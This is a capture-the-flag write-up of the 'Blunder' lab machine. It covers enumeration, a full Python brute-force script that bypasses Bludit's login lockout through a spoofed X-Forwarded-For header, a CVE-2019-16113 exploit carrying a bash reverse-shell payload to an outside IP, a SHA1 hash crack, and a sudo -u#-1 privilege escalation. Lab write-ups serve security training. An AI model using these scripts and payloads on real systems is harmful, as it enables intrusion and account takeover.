Blunder is Linux box which having IP address 10.10.10.191, Let’s start with nmap scan and some enumeration part.
#nmap
Nmap scan report for 10.10.10.191 Host is up (0.32s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 21/tcp closed ftp 80/tcp open http? |_http-generator: Blunder | http-methods: |_ Supported Methods: OPTIONS |_http-title: Blunder | A blunder of interesting facts
#dirsearch
python3 dirsearch.py -u http://10.10.10.191 -e * Target: http://10.10.10.191 [11:44:57] Starting[11:45:01] 200 - 7KB - /%3f/ [11:45:10] 200 - 563B - /.gitignore [11:45:30] 200 - 7KB - /0 [11:45:56] 200 - 3KB - /about [11:46:04] 301 - 0B - /admin -> http://10.10.10.191/admin/ [11:46:08] 200 - 2KB - /admin/ [11:46:08] 200 - 2KB - /admin/.config
#wfuzz
wfuzz -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://10.10.10.191/FUZZ.txt" ******************************************************** * Wfuzz 2.4.5 - The Web Fuzzer * ******************************************************** Target: http://10.10.10.191/FUZZ.txt Total requests: 4658 =================================================================== ID Response Lines Word Chars Payload =================================================================== 000003519: 200 1 L 4 W 22 Ch "robots" 000004125: 200 4 L 23 W 118 Ch "todo"
Dig into todo.txt
-Update the CMS -Turn off FTP - DONE -Remove old users - DONE -Inform fergus that the new blog needs images - PENDING
And we found username Fergus of admin panel and got hint about Bludit CMS. Now tried for password guessing but didn’t work, try the common methodology create wordlist using cewl and try to bruteforce.
#cewl
cewl -w passwords.txt -d 10 -m 1 http://10.10.10.191
Tried different tools for brute force but didn’t work because of Bludit brute force mitigation https://rastating.github.io/bludit-brute-force-mitigation-bypass/
bruteforce.py
!/usr/bin/env python3
import re
import requests
from future import print_function
def open_ressources(file_path):
return [item.replace("\n", "") for item in open(file_path).readlines()]
host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = open_ressources('/home/kali/passwords.txt')
for password in wordlist:
session = requests.Session()
login_page = session.get(login_url)
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
print('[*] Trying: {p}'.format(p = password)) headers = { 'X-Forwarded-For': password, 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36', 'Referer': login_url } data = { 'tokenCSRF': csrf_token, 'username': username, 'password': password, 'save': '' } login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False) if 'location' in login_result.headers: if '/admin/dashboard' in login_result.headers['location']: print() print('SUCCESS: Password found!') print('Use {u}:{p} to login.'.format(u = username, p = password)) print() break
And got fergus:RolandDeschain login into CMS Bludit, Check for CVE for Bludit CMS and got CVE-2019-16113
https://github.com/cybervaca/CVE-2019-16113 // this exploit written in python as well as you can go with the Metasploit framework https://www.exploit-db.com/exploits/47699
I used exploit from github.
python3 CVE-2019-16113.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c "bash -c 'bash -i >& /dev/tcp/10.10.14.245/1337 0>&1'"

Listen for specific port in this case 1337
nc -lvp 1337
After got reverse shell, try to dig into some files /var/www/bludit-3.10.0a/bl-content/databases/ in this directory there is users.php file

There is hash value, first try to identify it and it’s SHA1 then try to crack it online https://md5decrypt.net/en/Sha1/
faca404fd5c0a31cf1897b823c695c85cffeb98d : Password120
#user
[email protected]:/var/www/bludit-3.9.2/bl-content/tmp$ su hugo su hugo Password: Password120 cat user.txt 13270375df398ae7fb7f28d27117d7aa
Now try simple method for getting root, tried sudo -l and got message (ALL, !root) /bin/bash.
Simple try google (ALL, !root) /bin/bash and got https://www.exploit-db.com/exploits/47502
#root
$ sudo -u#-1 /bin/bash sudo -u#-1 /bin/bash Password: Password120 [email protected]:/root# cat root.txt cat root.txt 1116025955c775dd9462ff1f6f4bdd68
Hope you Enjoy it 😀